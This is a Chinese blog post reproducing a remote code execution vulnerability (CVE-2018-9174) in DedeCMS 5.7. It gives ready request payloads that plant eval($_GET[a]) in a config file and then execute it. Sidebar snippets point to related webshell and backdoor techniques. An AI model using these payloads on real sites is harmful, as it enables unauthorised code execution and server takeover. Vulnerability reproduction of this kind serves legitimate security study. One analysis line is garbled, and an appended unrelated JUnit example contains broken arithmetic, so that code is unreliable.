dedecms sys_verifies.php远程代码执行漏洞(CVE-2018-9174)

最新推荐文章于 2024-08-14 09:28:36 发布
最新推荐文章于 2024-08-14 09:28:36 发布
阅读量1.5k 收藏 2
点赞数 1
分类专栏: Security cms 文章标签: php 安全 cms
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_39086634/article/details/109805778
版权

dedecms sys_verifies.php远程代码执行漏洞(CVE-2018-9174)

漏洞描述:

​ DesdevDedeCMS5.7版本中的sys_verifies.php文件存在安全漏洞,该漏洞源于攻击者可控制modifytmp.inc文件的内容,远程攻击者可借助‘refiles’数组参数利用该漏洞执行任意的PHP代码

影响版本:

​ DesdevDedeCMS 5.7版本

漏洞复现:

下载DesdevDedeCMS5.7版本安装包,解压,创建数据库,如果想降低安装难度,可以使用phpstudy等

构造paylaod :sys_verifies.php?action=getfiles&refiles[0]=123&refiles[1]=%22;eval($_GET[a]);die();// ,然后拼接在url后执行

PS:本漏洞需要登陆

然后再构造payload并执行:sys_verifies.php?action=down&a=phpinfo();

也可以直接 sys_verifies.php?action=getfiles&refiles[0]=123&refiles[1]=\";phpinfo();die();//

漏洞复现成功

漏洞分析:

首先,可以查看sys_verifies.php 存在该漏洞的代码点,如下图

image-20201118172300424

首先,action会获取传入的refiles数组,并保存为data目录下 modifytmp.inc,如下图所示

f i l e n a m e = s u b s t r ( filename = substr( filename=substr(filename,3,strlen($filename)-3); 处会截取前三位与后三位中间的内容,所以可以借此构造payload,闭合前面的内容并添加恶意代码,且此处并没有有效代码检查

在payload中 refiles[1]=%22;eval($_GET[a]);die();// %22; 是为了闭合上图中 $files[1] = " 从而写入恶意代码

修复建议:

升级更新以修复漏洞

Darklord.W
关注
专栏目录
python_plugin_unittest.rar_The Test_unittest python
09-19
在Python编程环境中,unittest模块是内置的测试框架,用于编写和执行单元测试。"python_plugin_unittest.rar_The Test_unittest python"这个标题暗示我们正在处理一个与Python插件相关的单元测试项目,其中可能包含...
DedeCMS_v5.7漏洞复现
qq_51459600的博客
04-06 1万+
DedeCMS_v5.7漏洞复现 环境搭建: 服务器:WinServer2008(10.10.10.143) + phpstudy2018 DedeCMS版本:DedeCMS-V5.7-UTF8-SP2 下载地址:https://pan.baidu.com/s/1GQjWSDe7IlMVsVJ7HvrBOw 提取码: i4wk 0x01 URL重定向 版本<=5.7sp2 漏洞复现 payload: http://10.10.10.143/Dedecms/plus/download.php?open
ThinkCMF+Dedecms+discuz漏洞复现
热门推荐
1ance's blog
11-13 1万+
写在前面:本文为网上下载的cms搭建的靶场环境,内含thinkCMF+dedecms+discuz!;通过对靶场的测试,对cms漏洞进行复现。 欢迎大家点赞收藏,点点关注更好了hhhhhh 文章目录0x001 环境搭建0x002 漏洞复现0x01 弱口令0x02 任意文件上传0x03 头像上传处存在任意文件删除漏洞0x04 任意文件包含漏洞0x05 后台存在SQL注入0x06 URL重定向0x07 远程代码执行0x08 任意文件上传0x09 存储型XSS0x10 远程代码执行0x11 个人资料处存在存储型
HW漏洞威胁情报第十九天|HW情报
最新发布
weixin_43167326的博客
08-14 1121
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
DEDE 5.7中各函数所在的文件和位置
didingwan3441的博客
08-07 394
/include/taglib/tag.lib.php 2 //function GetTags()/include/payment/yeepay.php 415 function log_result()/dede/stepselect_main.php 204 function __addenum_save()/dede/stepselect_main.php 147 functi...
DedeCMS_v5.7其他漏洞复现
wutiangui的博客
09-12 550
其中aHR0cDovL3d3dy5iYWlkdS5jb20=是http://www.baidu.com的base64编码。管理员在添加用户购买商品的配送方式时,可能会触发存储型xss。进入后台—>会员—>配货方式设置—>增加一个配货方式。二、后台shops_delivery_存储型XSS。后台modifytmp.inc被写入了新内容。三、sys_verifies后台文件写入。用户在购买商品时会自动弹出配送方式列表。版本:5.7sp1、5.7sp2。访问后发现直接转到百度。
DedeCMS 未授权远程命令执行漏洞分析
Keepb1ue的博客
04-12 1040
DedeCMS是国内专业的PHP网站内容管理系统-织梦内容管理系统,采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY自己的网站提供了强有力的支持。高效率标签缓存机制:允许对同类的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在模型不能满足用户所有需求的情况下,DedeCMS推出一些互动的模块对系统进行补充,尽量满足用户的需求。
no-octal-constants-above-256.rar_The Test
09-24
【描述】"This test verifies that the keyword cannot be used as an identifier for Java." 指出,此测试的核心在于验证Java中关键字不能被用作标识符。在Java中,标识符是用来命名变量、类、方法等的符号,它们...
pv_boost.rar_High Voltage!_converter_matlab_matlab PV_paper
07-14
The concerns for environment due the ever increasing... This result verifies that with the minimum number of components the proposed improved boost converter system has the advantages of high efficiency.
官网下载:Windows-KB841290-x86-ENU.zip
11-20
Fciv is a command line utility that computes and verifies hashes of files. It computes a MD5 or SHA1 cryptographic hash of the content of the file. If the file is modified, the hash is different. ...
NIST SP800-88_rev1.pdf
02-21
The organization tracks, documents, and verifies media sanitization and destruction actions and periodically tests sanitization equipment/procedures to ensure correct performance. The organization ...
dedecms+5.7+is+php,Dedecms V5.7后台的两处getshell
weixin_33443597的博客
03-27 230
在这个帖子里我把两个洞一起写出来。第一个是常见的思路,把语句写入inc文件,然后在其他的include语句中,包含了恶意代码进而getshell。漏洞代码在:/dede/sys_verifies.php 代码如下:else if ($action == 'getfiles'){if(!isset($refiles)){ShowMsg("你没进行任何操作!","sys_verifies.php")...
CVE-2018-9175 DEDECMS后台getshell
weixin_43263451的博客
03-19 1654
基础 dedecms对于输入是首先全局进行过滤的,在/common.inc.php中注册(赋值变量)并过滤外部提交的参数,下图可以看到对输入参数进行addslashes 漏洞分析 首先在 dede\sys_verifies.php的152行 159-160行创建配置文件modifytmp.inc 161-162行给其中写入一些php的头和内容 166行中refiles参数是我们可控的,看起来默认是数组格式,对于refiles里面每一个值从168-180行进行一些操作,注意最重要的是180行,前面都无所谓
php 木马程序,PHP木马程序如何入侵服务器
weixin_29468561的博客
03-09 464
PHP文件中插入下边这句话,程序顷刻间就成能变身为木马程序。test.php文件内容:访问:https://www.ziyouwu.com/test.php?c=你想用的各种PHP语句体比如我的使用方式是这样的:https://www.ziyouwu.com/test.php?c=fputs(fopen("hacker.php","w"),"Hello,Hacker!");这个是时候就会在根目录...
Dedecms V5.7后台的两处getshell
weixin_33921089的博客
01-05 906
在这个帖子里我把两个洞一起写出来。 第一个是常见的思路,把语句写入inc文件,然后在其他的include语句中,包含了恶意代码进而getshell。漏洞代码在:/dede/sys_verifies.php 代码如下: else if ($action == 'getfiles') { if(!isset($refiles)) { ShowMsg("你...
CVE-2019-5786 漏洞原理分析及利用
晓得哥的博客
07-02 1588
CVE-2019-5786 漏洞原理分析及利用 作者:Kerne7@知道创宇404实验室 时间:2020年6月29日 从补丁发现漏洞本质 首先根据谷歌博客收集相关CVE-2019-5786漏洞的资料:High CVE-2019-5786: Use-after-free in FileReader,得知是FileReader上的UAF漏洞。 然后查看https://github.com/chromium/chromium/commit/ba9748e78ec7e9c0d594e7edf7b2c07ea2a90
Weblogic任意文件上传漏洞CVE-2018-2894)复现
浅浅的博客
07-28 1万+
Weblogic任意文件上传漏洞CVE-2018-2894)复现 一、漏洞概述 Weblogic管理端未授权的两个页面存在任意上传jsp文件漏洞,进而获取服务器权限。 Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在 ‘生产模式’ 下默认不开启,所以该漏洞有一定限制。两个页面...
CVE-2019-5418漏洞复现
千寻的博客
01-07 4593
CVE-2019-5418漏洞复现 0x00 漏洞介绍 Ruby on Rails是一个web应用程序框架,是相对较新的web应用程序框架 构建在Ruby语言上 0x01漏洞原理 在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。 通过传入Accept: …/…/…/…/…/…/…/…/etc/passwd{{({{闭合模板路径)头来...
*calculate integers from -2^Integer.MAX_VALUE(exclusive) to +2^Integer.MAX_VALUE. and then design a suitable test strategy and implement it in JUnit.****
06-06
To calculate integers from -2^Integer.MAX_VALUE (exclusive) to +2^Integer.MAX_VALUE (exclusive), we can use a loop that iterates from -2^Integer.MAX_VALUE to +2^Integer.MAX_VALUE, incrementing by 1 in each iteration. However, since this range is extremely large, the loop will take a very long time to complete. To design a suitable test strategy for this task, we can use boundary value analysis. We can test the following cases: 1. Minimum value (-2^Integer.MAX_VALUE) 2. Maximum value (+2^Integer.MAX_VALUE - 1) 3. Values just below the minimum value (-2^Integer.MAX_VALUE + 1) 4. Values just above the maximum value (+2^Integer.MAX_VALUE - 2) 5. Random values within the range For each of these cases, we can verify that the calculated integer is within the expected range. We can also verify that the loop terminates without any errors. Here's an example implementation of the JUnit test: ``` import static org.junit.Assert.*; import org.junit.Test; public class IntegerRangeTest { @Test public void testIntegerRange() { int min = Integer.MIN_VALUE; int max = Integer.MAX_VALUE - 1; // Test minimum value assertEquals(min, -Math.pow(2, Integer.MAX_VALUE)); // Test maximum value assertEquals(max, Math.pow(2, Integer.MAX_VALUE) - 1); // Test value just below minimum assertEquals(min + 1, -Math.pow(2, Integer.MAX_VALUE) + 1); // Test value just above maximum assertEquals(max - 1, Math.pow(2, Integer.MAX_VALUE) - 2); // Test random values within range for (int i = -1000; i <= 1000; i++) { int val = i * 1000000; assertTrue(val >= min && val <= max); } } } ``` This test verifies that the calculated integers are within the expected range for various boundary and random values.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值